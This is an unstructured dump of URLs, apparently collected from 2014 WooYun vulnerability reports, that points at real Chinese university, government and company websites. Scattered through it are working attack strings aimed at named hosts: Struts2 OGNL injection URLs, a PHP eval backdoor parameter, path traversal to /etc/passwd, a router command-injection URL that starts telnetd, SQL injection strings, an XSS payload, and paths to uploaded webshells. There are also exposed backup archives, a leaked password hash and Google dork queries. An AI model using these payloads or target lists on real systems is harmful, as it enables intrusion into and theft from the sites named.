http://cwcx.njmu.edu.cn/WFManager/loginAction_getCheckCodeImg.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://www.fangxinbao.com/question/137.html http://www.fangxinbao.com/question/321.html http://www.fangxinbao.com/product-ask/239.html http://wooyun.org/bugs/wooyun-2014-059437 com:wooyun oa:http://oa.chanjet.com/ http://x55.me/cmseasy.php?xss=test ip:221.226.48.130 http://zc.cjrc.com.cn/modules/universe/ArticleDetail.aspx?id=13 http://xxx.xxx/xss.swf loader:URLLoader https://kyfw.12306.cn inurl:/OnlineQuery/QueryDetail.aspx http://shenpi.yuzhou.gov.cn/OnlineQuery/QueryDetail.aspx?QueryId=487 http://www.sqlmap.org http://xiage.yy.com/thread-84277-1-1.html http://xiage.yy.com/ http://open.pcpop.com/Ajax_EbWorthBuyingProdu http://sqlmap.org http://mgr.yaofang.cn/login http://dealer.yaofang.cn/ http://zone.wooyun.org/content/12400 http://www.chinavvv.com/ inurl:/dwld/dwld.jsp http://shenpi.hengyang.gov.cn/langchao.ecgap.outportal/OnlineQuery/Quer http://www.sqlmap.org http://sfj.yueyang.gov.cn/open.php?typeid=1 http://sfj.yueyang.gov.cn/open.php?id=8439&t=new.html http://sfj.yueyang.gov.cn/open.php?id=81%7Copen.php?id=80%7Copen.php?id=79%7Copen.php?id=78%7Copen.php?id=77%7Copen.php?id=76 http://zszc.yangtzeu.edu.cn/admin/Login.aspx http://zszc.yangtzeu.edu.cn/admin http://jxjy.yangtzeu.edu.cn/onews.asp?id=1434 http://jxjy.yangtzeu.edu.cn/hsb/gbook/guestbook.asp?user=jxjyxy http://jxjy.yangtzeu.edu.cn/hsb/gbook/guestbook.asp?user=jxjyxy http://admission.whu.edu.cn/Whyus.aspx?i=1842&s=aboutus http://admission.whu.edu.cn/Notices.aspx?c2=177&s=Notice http://admission.whu.edu.cn/Admission.aspx?i=1954 http://admission.whu.edu.cn/Info.aspx?i=1892&s=Accommodation http://admission.whu.edu.cn/StuServers.aspxi=1898&s=StudentService http://admission.whu.edu.cn/NoticeView.aspx?i=2084 http://admission.whu.edu.cn/StuServers.aspx?s=StudentService&i=2079 http://admission.whu.edu.cn/Notices.aspx?c2=177 http://admission.whu.edu.cn/Info.aspx?i=1853 http://admission.whu.edu.cn/Courses.aspx?&skyy=English http://admission.whu.edu.cn/Whyus.aspx?i=1842 http://admission.whu.edu.cn/Contact.aspx?c=166 http://82554251.home.news.cn/portal/ http://media.whu.edu.cn/more.asp?classid=2 http://media.whu.edu.cn/Expertdetail.asp?id=1 http://media.whu.edu.cn/Search.asp http://journal.whu.edu.cn/oldsite/academia/read_academia.php?id=1589 http://journal.whu.edu.cn/oldsite/news/read_news.php?id=1452 http://www.phpoa.cn/下载一份 http://192.168.1.114/install/install.php http://192.168.1.114/admin.php?ac=user&fileurl=mana&do=add http://oa.polyfilm.net:7001/defaultroot/govezoffice/custom_documentmanager/smartUpload.jsp?path=innerMailbox&fileName=innerMailFileName&saveName=innerMailSaveName&tableName=innerMaildisplaytable&fileMaxSize=0&fileMaxNum=0&fileType=&fileMinHeight=0&fileMinWidth=0&fileMaxHeight=0&fileMaxWidth=0 http://hljxwjtheb.vicp.cc:7001/defaultroot/custom_form/smartUpload.jsp?path=innerMailbox&fileName=innerMailFileName&saveName=innerMailSaveName&tableName=innerMaildisplaytable&fileMaxSize=0&fileMaxNum=0&fileType=&fileMinHeight=0&fileMinWidth=0&fileMaxHeight=0&fileMaxWidth=0 http://irridrain.whu.edu.cn/news/class/index.php?key=88952634&myord=uptime&myshownums=10 http://irridrain.whu.edu.cn/news/class/index.php?key=88952634&myord=uptime&myshownums=10 http://www.xsjy.whu.edu.cn/jiuyexinxi/list.php?order=meettime http://ygxy.rsgis.whu.edu.cn/admin/column_menu_del.php?id= http://xyy.jlu.edu.cn/yygk.php?id=562 http://xyy.jlu.edu.cn/dwgz.php?id=334 http://xyy.jlu.edu.cn/dw.php?id=442 http://xyy.jlu.edu.cn/gh.php?bid=177 http://xyy.jlu.edu.cn/bjgl.php?id=287 http://xyy.jlu.edu.cn/jkjywz.php?id=745 http://xyy.jlu.edu.cn/jbkz.php?bid=220 http://xyy.jlu.edu.cn/ylgl.php?id=564 http://xyy.jlu.edu.cn/ybgl.php?id=584 http://xyy.jlu.edu.cn/hlgl.php?id=341 http://xyy.jlu.edu.cn/hl_jj.php?id=540 http://xyy.jlu.edu.cn/hl_dt.php?bid=232 http://xyy.jlu.edu.cn/hl_gjt.php?id=525 http://xyy.jlu.edu.cn/yxgl.php?id=405 http://xyy.jlu.edu.cn/ypglwz.php?id=438 http://xyy.jlu.edu.cn/qxglwz.php?id=743 http://www.xxx.com/okyy123551/login.php http://www.iapppay.com/ http://ipay.iapppay.com:8888/images/paywss/regimg/300990/register1402111322737.jsp;菜刀连接 http://www.szwzfy.gov.cn/fglt_show.php?id=37 http://lu.sogou.com/ads?sohuurl=&kwd=1&w=cGlkPXNvZ291X3dlYnRvbmdmYXdlbnomZm10PWFkcyZzcT0iO2RvY3VtZW50LndyaXRlKCc8c2NyaXB0L3NyYz0vL3hzcy5wdy9qPicpOy8v url:http://cq.qq.com/house/2222.htm json:http://ud.cq.qq.com/api/activity/6968/result/js?pagesize=200 http://open.letvstore.com/.svn/entries http://open.letvstore.com http://cron.api.letvstore.com/file-center/app/2014/06/07/c6f3b5d5-afbf-4a18-bef9-3e1f9dc48dcd.html http://icare.qq.com/ http://oa.zto.cn/seeyon/ http://zs.njupt.edu.cn/html/Index/article/id/356 http://zs.njupt.edu.cn/html/Index/article/id/* http://jingyan.baidu.com/article/db55b609adc61d4ba30a2f88.html http://hljxwjtheb.vicp.cc:7001/defaultroot/public/jsp/livephotoupload2.jsp?path=peopleinfo&visualName=empLivingPhotoTemp&hiddenName=empLivingPhoto&del=yes http://hljxwjtheb.vicp.cc:7001/defaultroot/public/jsp/livephotoupload.jsp?path=desktop&mode=add&hiddenName=unitImgSaveName&visualName=unitImgName http://www.baidu.com/s?cl=3&wd=Wanhu+ezOFFICE http://74.125.227.77/#newwindow=1&q=Wanhu+ezOFFICE&start=20 www.scfda.gov.cn/message/messageManager/messageslist.jsp?fieldName=&curPage=&query=12&goInt=1 http://www.cmd5.com/ http://jc.scfda.gov.cn/index.do http://oa.scfda.gov.cn/logoff.do?formAction=logoff http://222.197.192.122/seeyon/main.do http://6678.online.tj.cn/go.asp?url=http://www.sina.com.cn&id=23100&up_kind= http://www.sina.com.cn http://6678.online.tj.cn/go.asp?url=http://www.sina.com.cn&id=23100&up_kind= http://6678.online.tj.cn/go.asp?url=http://www.sina.com.cn&id=23100&up_kind= https://user.iapppay.com:8083/userservice/u/login.do http://ltxc.jlu.edu.cn/Art_Show.php?id=63 http://jdyxb.jlu.edu.cn/news.php?bid=1 http://jdyxb.jlu.edu.cn/newslist.php?bid=210 http://jdyxb.jlu.edu.cn/hzjl.php?bid=208 http://jdyxb.jlu.edu.cn/newsshow.php?id=1968 http://jdyxb.jlu.edu.cn/xinwen.php?bid=3 http://lsjyw.lnnu.edu.cn/detail.asp?id=6022 http://jwc.jlu.edu.cn/?file=info&act=view&id=1 http://epaper.jlu.edu.cn:81/remark.php?doc_id=8640 http://xiaobao.jlu.edu.cn/newindex/newspic.php?qishu=369 http://ccpser.jlu.edu.cn/luntsee.php?id=1733 http://apps.jlu.edu.cn:808/jwk-xk/cx/kbcx/stuQueryMain.jsp http://juccc.jlu.edu.cn/otherpublications_edit0.php?id=8 http://ygdg.dg.gov.cn/ http://kjy.jlu.edu.cn/?file=info&act=view&id=335 http://xchb.jlu.edu.cn/lanmu.php?fid=1 http://xchb.jlu.edu.cn/lanmu.php?fid=7&&article=3077 http://xchb.jlu.edu.cn/lanmu.php?fid=7&&article=3077 http://mpa.jlu.edu.cn/inc/annexdata.php?id=300 http://geo.jlu.edu.cn/lab/class.php?classid=1&Nclassid=3 http://119.jlu.edu.cn/show.php?id=681 http://119.jlu.edu.cn/navxfcs.php?page=1&id=9 http://119.jlu.edu.cn/navxfys.php?page=1&id=10 http://gjc.jlu.edu.cn/oic/hwzj/gjhy_content.php?type=4 http://gjc.jlu.edu.cn/oic/lxjd/lxjd_xm_detail.php?data1_num=19 http://gjc.jlu.edu.cn/oic/cgcj/cgxz.php?module=8&link_type=1 http://gjc.jlu.edu.cn/oic/cgcj/cgxz.php?module=8&link_type=1 www.qyx.gov.cn http://swzx.jlu.edu.cn/swsysfzx/cx_list/index.php?id=9d907e2a-4b3c-11e3-9201-dc0ea182a1ef&info_id=26108e63-4c04-11e3-8a3d-dc0ea182a1ef&context_id=c140dd66-dfe2-11e3-8782-000795185730 http://swzx.jlu.edu.cn/swsysfzx/cx_list/index.php?id=9d907e2a-4b3c-11e3-9201-dc0ea182a1ef&info_id=26108e63-4c04-11e3-8a3d-dc0ea182a1ef&context_id=c140dd66-dfe2-11e3-8782-000795185730 http://swzx.jlu.edu.cn/innovation/news/news_con.php?id=f6c5b1a0-ba33-11e3-835c-6cae8b20789d http://swzx.jlu.edu.cn/swsysfzx/shizi/t_info.php?id=9ec4e51e-6f93-11e3-9541-80a1a556c2c8 http://swzx.jlu.edu.cn/swsysfzx/cx_list/cx_content.php?id=a3be5d16-4b3c-11e3-9201-dc0ea182a1ef&context_id=9f6d1f8a-b3e7-11e3-bfc1-b6a0001c8e77 http://swzx.jlu.edu.cn/swsysfzx/cx_list/cx_content.php?id=a3be5d16-4b3c-11e3-9201-dc0ea182a1ef&context_id=9f6d1f8a-b3e7-11e3-bfc1-b6a0001c8e77 http://www.baidu.com/s?wd=powerd%20by%20BEESCMS http://www.beescms.com/ http://www.beescms.com/demo/ http://beescmsus.us207.eoidc.net/admin/login.php http://cp.dns-china.com/vpsadm/,在vps管理页面可以获取到控制面板的登录密码。控制面板的登录名为vps+ip后六位,例如ip为XXX.XX1.23.234的登录名为vps123234。 http://sys.59.cn/System/ajax.asp?act=getvpspass,如果成功会刷新vps管理页面的登录密码。 http://www.iaps.sdu.edu.cn/ http://www.choumei.cn/admin.php http://dmbz.juneyaoair.com:88/login.jsp http://www.360eol.com/eol/quanguo/newsForNew/index_frame.jsp?randomId=7F121A51-A316-9D51-E039-559000FCBBFA http://exam.netentsec.com/ http://www.ahzsks.cn/Ordinary5/article.jsp?articleId=44563738 http://smlt.tl.gov.cn/inter/live_detail.php?id=597277 http://old.cdbs.com.cn/g/show.asp?site=cdbs&channel=news&category=article&type=column590x150&location=1 cn:8050/index.php?mid=4 http://www.soso.com/q?utf-8=ie&pid=s.idx&cid=s.idx.se&unc=&query= http://chjw.njau.edu.cn/showinfo.asp?id=728 http://wxy.ahu.edu.cn/djgz_show.asp?id=359 http://wxy.ahu.edu.cn/admin/ http://house.focus.cn/community/cqxuefuyaohao/khlist.php?id=1 http://demo.1hai.cn/ http://demo.1hai.cn/ChargeAccount/ http://demo.1hai.cn/SSOLogin/ http://demo.1hai.cn/vendor/maintain/ http://demo.1hai.cn/qx/ http://demo.1hai.cn/bd/login.aspx?returl=default.aspx http://demo.1hai.cn/SalesWeb/ http://demo.1hai.cn/m/chauffeur/selfdriver.aspx?__ufps=937141 http://demo.1hai.cn/interface/MessgerCenter/Admin/Img/SmsNet4C.png http://180.169.55.154:88/ http://180.169.55.154:88/Administration/DepartmentDetail.aspx?DEP_ID=18 http://180.168.124.32:90/ http://180.168.124.150/eProcess/LoginNoAD.aspx http://180.168.124.150/eProcess/upfile/这里的文件查询,可以跨目录.,目录错误,会报出web路径 http://eben.e18.cc/web/web22/index.action http://www.ao-t.com/ http://xsc.nau.edu.cn/zs/nau-zs/Shownews.asp?id=537 http://www2.shisu.edu.cn/sisunews/show_news.php?id=6115 http://www.ctnma.cn/sysPwdQuestion!check.do inurl:lcm.ynjy.cn”即可查到数据 http://www.ftsports.gov.cn/news.asp?news_id=852 http://news.cnhubu.com/webmanage/login.aspx http://member.517best.com/login.aspx http://www.tnwsj.gov.cn/shownewsinfo2.asp?news_id=280 http://www.zzsyzp.com/sydwzk/refer/refer.jsp?AreaID=1&DeptType=1&PublicFlag=2&FrequentFlag=2&TypeID=0&Keyword=%25%27+and+1%3D1+and+%27%25%27%3D%27&goNo=&ShowCountNo=10&ShowCount=10&totalNO=1 inurl:sydwzk/demand http://www.pudn.com/comment.asp?type_id=1010 http://yqdj.sheyang.gov.cn/admin/index.htm site:ttpod.com inurl:admin http://fm.admin.ttpod.com/ http://fm.admin.ttpod.com/a fm.admin.ttpod.com/releases/20140506095415/public/index.php http://www.aili.com.cn/aili.rar http://www.aili.com.cn/myadmin/index.php http://wooyun.org/bugs/wooyun-2014-060688 http://221.233.24.38 http://221.233.24.55/common/shell/ http://221.233.24.55/common/shell/BillBack.sh http://221.233.24.24/phpinfo.php http://221.233.24.38/manual/ http://221.233.24.38 http://www.sf-express.com/sf-service-web/service/billPicture/运单号/image?phone=运单上手机号码&lang=sc®ion=cn http://rmsh.ccpph.com.cn/app/bookSearch.action http://rmsh.ccpph.com.cn/app/2.txt http://www.xbjcyc.cn/viewbbs.asp?id=109 http://makemoney.39.net/ http://itv.hb.vnet.cn/itv/ff/itv/hot.php?id=30 http://www.maxen.com.cn/plus/flink.php http://oa.hnu.cn/Home/Login https://pro.panasonic.cn/download.php?filename=./download.php http://dream.yiban.cn/new_detail.php?id=19 http://www.fjdpc.gov.cn/zfmllist.aspx?ctlgid=31314144 http://wooyun.org/bugs/wooyun-2014-058260 http://vpn.ycmd.com.cn/ http://v31.diyou.cc/transfer_success/index.html?keywords=1&borrow_type=&account_status=&borrow_interestrate=&spread_month= http://v31.diyou.cc/transfer_success/index.html http://sqlmap.sourceforge.net http://www.22shop.com http://www.22shop.com/mobile-Apple_iPad_Air.html http://www.22shop.com/mobile-6004.html http://newcar.xcar.com.cn/auto/index.php?r=Ajax/PsIndexDealer&pserid=192&province_id=30&city_id=347&_=1401781245246 http://www.fjaudit.gov.cn/zfndbg.aspx?p=1&ctlgid=88412874 http://www.fjaudit.gov.cn/zfgd.aspx?p=1&ctlgid=82583512 http://www.fjaudit.gov.cn/govMlTable.aspx?p=1&ctlgid=88632346,15788548,47786878,83527373,18562116,17714654 http://learn-document.googlecode.com/svn/trunk/Company/ICSON/Site.txt http://www.fjxwcbj.gov.cn/wsbsZn.aspx?ctlgid=756785 http://www.fjxwcbj.gov.cn/wsbsZn.aspx?p=1&ctlgid=756785 http://www.fjxwcbj.gov.cn/govGd.aspx?p=1&ctlgid=25854565 http://www.fjxwcbj.gov.cn/govBg.aspx?p=1&ctlgid=21252317 http://www.fjta.gov.cn/SystemManage/Vote/ShowVoteRate.aspx?AllQn=472&LanguageTypeID=0&Action=vote http://www.fjta.gov.cn/news/newslist-1-130.html?t=%5b%e9%87%87%e7%bc%96%5d http://www.universalresort.com.cn/dnews.asp?id=74 http://www.universalresort.com.cn/manage/index.asp http://www.fjjg.gov.cn/cms/cms/infopub/rss.jsp?channelcode=A1228&maxnum=20 http://qqypt.fsecity.com:8080/sc/login.action http://zwdt.tz.gov.cn/riseapprove_web/admin.jsp http://x.kuwo.cn/KuwoLive/GetTopGiftWeekList?uid=129683106 http://help.sundns.com/help/index.php?page=${@print%28eval%28$_POST[wooyu-ag]%29%29 http://120.197.95.82:8081/ringmanager/ums/user!login.action http://search.uzai.com/search/wordlink?q=g&ran=0.07143457215560722&searchCallBack=jsonpCallback&_=1402214741100 http://search.uzai.com/search/wordlink?q=g%2527&ran=0.07143457215560722&searchCallBack=jsonpCallback&_=1402214741100 http://search.uzai.com/search/wordlink?q=g%25%2527 http://search.uzai.com/search/wordlink?q=g%25%2527 http://www.banwoxingcar.com/news_show.asp?id=1367 http://www.tuniu.com/main.php?do=online_book_visitor&order_id=3478187 http://www.fjjt.gov.cn:8000/guestbook/New_gb.asp?action=rep&gb_id=11 http://www.fjjt.gov.cn:8000/printpage.asp?ArticleID=5217 http://wanwan.sina.com.cn/thirdpartypapi/logingmae.php?gid=18001219&origin=3171&oid=1004102910003&wyx_user_id=xxxx&wyx_session_key=xxxxx&wyx_create=1402188440&wyx_expire=1402224440&wyx_signature=cf96579d64c57efef11bbaac05c6ad8339c5ad9c http://promotion.taobao.com/worldcup/actCommonLottery.do?回车,按住′ http://www.10658235.com:8080/webpos/login.jsp http://point.bjgwbn.net.cn/newsinfo.aspx?nid=78 intitle:ZDSoft城域综合信息平台 http://120.35.4.22:8080/cnet/student2/generalquery/archives/archivesfrm.jsp http://222.132.51.26:1949/cnet/student2/generalquery/archives/archivesfrm.jsp http://220.166.21.94:8080/cnet/student2/generalquery/archives/archivesfrm.jsp http://vod.ydxedu.com:81/cnet/student2/generalquery/archives/archivesfrm.jsp http://www.gyzqjy.com:8080/cnet/student2/generalquery/archives/archivesfrm.jsp http://118.122.51.66:8080/cnet/student2/generalquery/archives/archivesfrm.jsp http://gm.fsjy.cn:8080/cnet/student2/generalquery/archives/archivesfrm.jsp http://221.0.93.135/cnet/student2/generalquery/archives/archivesfrm.jsp http://oa.fsjyj.gov.cn:81/cnet/student2/generalquery/archives/archivesfrm.jsp http://211.86.89.229:9999/cnet/student2/generalquery/archives/archivesfrm.jsp http://61.153.240.147:8080/cnet/student2/generalquery/archives/archivesfrm.jsp http://120.35.4.22:8080/cnet/student2/generalquery/archives/archivesfrm.jsp http://oa.jdsam.com/ http://store.aion.sdo.com:9101/project/20140506/index.aspx?token= site:gov.cn inurl:wsyygh http://health.sxws.gov.cn/yypt/wsyygh/index.action,该系统存S2-16漏洞,利用如图, http://health.sxws.gov.cn/yypt/wooyun.txt http://h.133.cn/hotel/message/view?m=3xxxx http://h.133.cn/cr/message/upimages/1403311714283119_..2.jpg20140331170036.5518190440721.php_.html http://h.133.cn/cr/message/upimages/1403311712419434_..2.jpg20140331170036.5518190440721.php_.php http://pei.wzu.edu.cn/dSource.aspx?id=27 http://www.sqlmap.org http://w19374.sto.cn/news_detail.asp?id=101683 https://222.36.19.35/portal_default/index2.html site:nyxdns.com http://8ce7482cc890.nyxdns.com/doc/page/main.asp http://8ce74813dad8.nyxdns.com:92/doc/page/main.asp http://8ce7483f6886.nyxdns.com/doc/page/main.asp http://8ce748232147.nyxdns.com/doc/page/main.asp http://8ce7484d3bea.nyxdns.com/doc/page/main.asp http://8ce7482d087d.nyxdns.com:85/doc/page/main.asp http://8ce7482ccb7f.nyxdns.com:90/doc/page/main.asp http://8ce74855a6b9.nyxdns.com:91/doc/page/main.asp http://8ce74855a6b9.nyxdns.com:92/doc/page/main.asp http://8ce74851ac2e.nyxdns.com:90/doc/page/main.asp http://8ce7482a1a93.nyxdns.com:90/doc/page/main.asp http://8ce7483fbd48.nyxdns.com:91/doc/page/main.asp http://8ce74854e5aa.nyxdns.com/doc/page/main.asp http://graduate.ahnu.edu.cn/ http://graduate.ahnu.edu.cn/demo/中的帐号:200802020230 http://graduate.ahnu.edu.cn/StudentInfo/InSchool/index.jsp?xh=200802020235& http://192.168.1.1/diagnosis.asp http://192.168.1.1/goform/Diagnosis?system_command=命令 http://192.168.1.1/goform/Diagnosis?system_command= admin:jwEx7t/7fl0lY:0:0:Adminstrator:/:/bin/sh http://192.168.1.1/goform/Diagnosis?system_command=telnetd http://nc.zjsdxf.cn/login/ http://www.jinri.net.cn http://www.xaltzw.gov.cn/Json.aspx?type=itemsearch&sncode= http://ny.jxqx.net/login.php http://114.255.114.125:80 http://www.cce.swu.edu.cn/e2/admin1/admin.jsp http://www.cce.swu.edu.cn/e2/reg_over.jsp http://www.we7.cn/ http://gov.we7.cn/User/AccountEdit.aspx http://gov.we7.cn/_data/Uploads/bdf99a45-43e8-45ba-a417-7752117fff7b.aspx http://ir.361sport.com/html/print_page_index.php?file_name=../../../../../../../../../../etc/passwd http://ir.361sport.com/s/print_page_index.php?file_name=../../../../../../../../../../etc/passwd http://ir.361sport.com/c/print_page_index.php?file_name=../../../../../../../../../../etc/passwd http://bkzs.tongji.edu.cn/?classid=3478&id=38&t=show http://61.178.82.54:9090/zjgl/publicQueryCard.action http://unep-iesd.tongji.edu.cn/?classid=894&action=video&id=2&t=show http://unep-iesd.tongji.edu.cn/?classid=894&action=video&id=2&t=show http://baowei.tongji.edu.cn/?classid=126&action=video&id=16&t=show http://baowei.tongji.edu.cn/?classid=126&action=video&id=16&t=show http://116.228.73.38:8080/twm/loginAction!init.action http://jgdw.tongji.edu.cn/Index.php?r=guest/block&id=1 http://rsks.qdhrss.gov.cn/dongtaiContent.aspx?id=875 http://railway.tongji.edu.cn/cn/aboutus.asp?id=25 http://222.66.39.212:8081/rims/login!.action http://222.66.39.212:8081/rims/login!.action http://cad.tongji.edu.cn/cad/noticedetail.aspx?id=17 http://cad.tongji.edu.cn/cad/newslist.aspx?id=42 http://cad.tongji.edu.cn/cad/project_detail.aspx?id=16 http://cad.tongji.edu.cn/cad/staff_detail.aspx?id=9 http://dgyj.tongji.edu.cn/contentUs.aspx?cuid=1 http://dgyj.tongji.edu.cn/NewsDetalied.aspx?nid=205 http://www.wxsfj.gov.cn/plus/flink.php www.iflytek.com。 http://www.wooyun.org/searchbug.php?q=DNS%E5%9F%9F%E4%BC%A0%E9%80%81 http://www.ahgcc.cn/siteserver/ http://www.ahgcc.cn/sitefiles/temporaryfiles/contents/iis.aspx http://www.ahgcc.cn site:googlecode.com intext:baidu.com http://www.yanjing.com.cn/ConTent.asp?MainId=3&BigClassid=1 http://www.voicecloud.cn:28017/ http://www.careland.com.cn/ht/Manage/Left.php http://jwy.whcm.edu.cn/chafen7/manager/_vti_cnf/st_right.asp?Action=MainMenu http://home.focus.cn/group/switch.php?v_poll_id=6913&group_id=1632&v_login_id=22741128&submit=%B5%B1%C7%B0%BD%E1%B9%FB http://zcc.tongji.edu.cn/?.pa=aT1QMTkwOTQzJnQ9YSZzPW1heGltaXplZCZtPXZpZXc%3D&act=info&id=2 http://cs.tju.edu.cn/iceccs/isise/manager/managerLogin.action Getshell:http://cs.tju.edu.cn/iceccs/isise/guige.jsp http://tide.iqiyi.com/WebResource.axd?d=XMQ9NVUp8W3Nas4YbO6SLg2 http://tide.iqiyi.com/ScriptResource.axd https://github.com/youkugems/m-cms-for-tudou-tv/blob/4d2093ed698c94b25d71e1eb50521a9fffd836d5/config/settings.yml.example https://github.com/youkugems/m-cms-for-tudou-tv/blob/4d2093ed698c94b25d71e1eb50521a9fffd836d5/config/deploy.rb http://www.hequ.gov.cn/hequ/manager/ http://www.youyax.com/404/shell.php http://demo.acsoft.com.cn/DownLoadPage.aspx?FileName=/web.config http://demo.51able.com/DownLoadPage.aspx?FileName=/web.config http://jeaie.ec.js.edu.cn/Question.aspx?act=q http://jeaie.ec.js.edu.cn/Question.aspx?qNo=425&act=q http://jeaie.ec.js.edu.cn/Question.aspx?act=q&qNo=425 http://jeaie.ec.js.edu.cn/AmericanCollege/Common.aspx?TypeNo=53&NewsType=-505 http://jeaie.ec.js.edu.cn/AmericanCollege/Common.aspx?NewsType=-201 http://jeaie.ec.js.edu.cn/Question.aspx?act=q&qNo=425 http://jeaie.ec.js.edu.cn/ShowNews.aspx?NewsType=2&NewsNo=1577 http://jeaie.ec.js.edu.cn/AmericanCollege/XiangMu.aspx?NewsType=-203 http://jeaie.ec.js.edu.cn/AmericanCollege/QuestionList.aspx?NewsType=-2 http://www.rongtian.com.cn/ http://gs.tju.edu.cn/xw/readnews.asp?NewsID=271 http://gs.tju.edu.cn/xw/Listfile.asp?ClassID=18 http://gs.tju.edu.cn/yjspy/py2013/kc_list.asp?xydm=117 http://gs.tju.edu.cn/xw/mvpsubjs.asp?id=2 http://gs.tju.edu.cn/xw/ListNews.asp?ClassID=30 http://www.7xfilm.com/web/xinxi/xinxi.php?id=1444 http://www.7xfilm.com/web/yxxx/yxxx_show.php?id=687 http://www.7xfilm.com/web/phzx/phzx.php?id=231 http://www.7xfilm.com/web/zxly/list.php http://www.foowu365.com/page/html/company.php?id=1 http://www.foowu365.com/page/html/company.php?id=1 http://www.ip138.com/www.rar http://222.18.15.131/zhaosheng/services/ http://222.18.15.131/zhaosheng/services/ysssjxg.php http://222.18.15.131/zhaosheng/services/2012zzzs.phpv http://ad.easou.com/admin/newsNoticeShowById.admin?id=1 http://www.wxcgzx.com/weboffice/ http://bbs.fumu.com/tj/admin.php http://www.joyoung.com/cgi-bin/test-cgi/* http://www.joyoung.com/index.jsp http://kf.joyoung.com/发现其Apache版本是2.2.17就想到了CVE-2012-0053然后验证了下确实存在此漏洞能读取http-only保护的cookies http://www.361sport.com/index.php?a=index&sell=1&m=product&groupby=1&size=35 http://officeimg.focus.cn/ http://www.shanting.gov.cn/jcms/m_5_7/replace/opr_importinfo.jsp?fn_billstatus=1 http://tuoshan.yzwh.gov.cn/jcms/m_5_7/replace/opr_importinfo.jsp?fn_billstatus=1 http://kf.joyoung.com/search.html http://116.236.150.104/masLoginLogicAction/login.action http://116.236.150.104/masLoginLogicAction/login.action?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29 http://60.29.37.234:9090/ http://battery.tcl.com/read_products.php?smname=MP3/MP4%CF%B5%C1%D0 http://www.bankrate.com.cn/jumpurl/aHR0cDovL3d3dy53b295dW4ub3JnL2luZGV4LnBocA== http://www.wooyun.org/index.php inurl:OnlineQuery/QueryList.aspx http://149.126.86.39/#newwindow=1&q=inurl:OnlineQuery/QueryList.aspx&start=20 http://www.whsfzb.gov.cn/OnlineQuery/QueryList.aspx http://www.ytshenpi.cn/OnlineQuery/QueryList.aspx http://www.rcsp.cn/OnlineQuery/QueryList.aspx http://www.lcxzfw.gov.cn/OnlineQuery/QueryList.aspx http://www.xtsxzfw.gov.cn/OnlineQuery/QueryList.aspx http://www.qjxzsp.com/langchao.ecgap.outportal/OnlineQuery/QueryList.aspx http://www.wdaac.cn/OnlineQuery/QueryList.aspx http://www.sdsp.cn/OnlineQuery/QueryList.aspx http://www.shspzx.gov.cn/OnlineQuery/QueryList.aspx http://222.135.78.34:8089/OnlineQuery/QueryList.aspx http://www.dftzfw.cn/waiwang/OnlineQuery/QueryList.aspx http://shenpi.xuchang.gov.cn/OnlineQuery/QueryList.aspx http://www.hdamo.gov.cn/OnlineQuery/QueryList.aspx http://221.176.217.34/szrx/OnlineQuery/QueryList.aspx http://www.e.lfang.gov.cn/OnlineQuery/QueryList.aspx http://xzsp.jianggan.gov.cn:8080/OnlineQuery/QueryList.aspx http://zmdxzfw.gov.cn/OnlineQuery/QueryList.aspx http://shenpi.changge.gov.cn/OnlineQuery/QueryList.aspx http://www.whsfzb.gov.cn/OnlineQuery/QueryList.aspx http://www.wdaac.cn/OnlineQuery/QueryList.aspx http://221.176.217.34/szrx/OnlineQuery/QueryList.aspx http://www.shspzx.gov.cn/OnlineQuery/QueryList.aspx http://oa.juneyaoair.com http://dmbz.juneyaoair.com/weboa/webpage.nsf/webpage?OpenForm http://111.205.51.12:8080/wcm/app/login.jsp www.site.com.wygkcn_AllUser.asp http://bm.xmu.edu.cn/wygkcn_AllUser.asp http://219.146.3.113/front/indexlogin.action http://219.146.3.113/front/indexlogin.action http://202.102.41.37:8080/login/login.do http://202.102.41.37:8080/login/login.do http://202.102.41.159/robot/check-login.action http://202.102.41.159/robot/check-login.action http://202.102.41.160/robot/check-login.action http://202.102.41.160/robot/check-login.action http://csldata.sports.sohu.com/admin.zip http://csldata.sports.sohu.com/backup.zip http://220.181.90.31/sql.rar http://220.181.90.31/www.rar http://jxkh.gtja.com/nxl.asp?article_O6QK1 http://www.panxian.gov.cn/jcms/workflow/design/que_model.jsp?userid= http://www.changde.gov.cn/jcms/workflow/design/que_model.jsp?userid= http://www.cshtz.gov.cn/jcms/workflow/design/que_model.jsp http://tuoshan.yzwh.gov.cn/jcms/workflow/design/que_model.jsp http://www.panxian.gov.cn/jcms/workflow/design/que_model.jsp?userid=&que_keywords=%E4%B8%80&que_keywords1=%E4%B8%80&que_classid=&que_classname=&b_valid=&starttime=&endtime=&sortorder=&sortnum=-1 https://github.com/wujiajun/juzhai-static/blob/e9ede9094a69a38feea6499272034e5078d3f64d/static/build.property.xml http://192.168.3.197:8080/karaoke/index.html"/ http://192.168.3.220:8090/karaoke/index.html"/ http://192.168.3.161:8080/karaoke/index.html"/ www1.server www1.username www1.password www1.port www1.javahome www1.user.dir www1.username}"/ www1.tomcat.dir www1.tomcat.webapps.dir www1.tomcat.dir}/webapps"/ www2.server www2.username www2.password www2.port www2.javahome www2.user.dir www2.username}"/ www2.tomcat.dir www2.tomcat.webapps.dir www2.tomcat.dir}/webapps"/ svn://server12/zdjt/globe/documents/NetProtocol/ProtocolForJava.xsd"/ https://github.com/alvayang/tinytools/blob/f4a9bcafb22dfc3188f143e011b85109e3140a9a/py/report_my_ip.py https://github.com/jadeball/tianxiawuai/blob/39abedfe6df07dbf5cb76343bc3973b8ab6b9b37/config.js http://loglyer.blog.163.com/ http://61.161.156.71/ http://sparepart.dfac.com/zecmd/zecmd.jsp 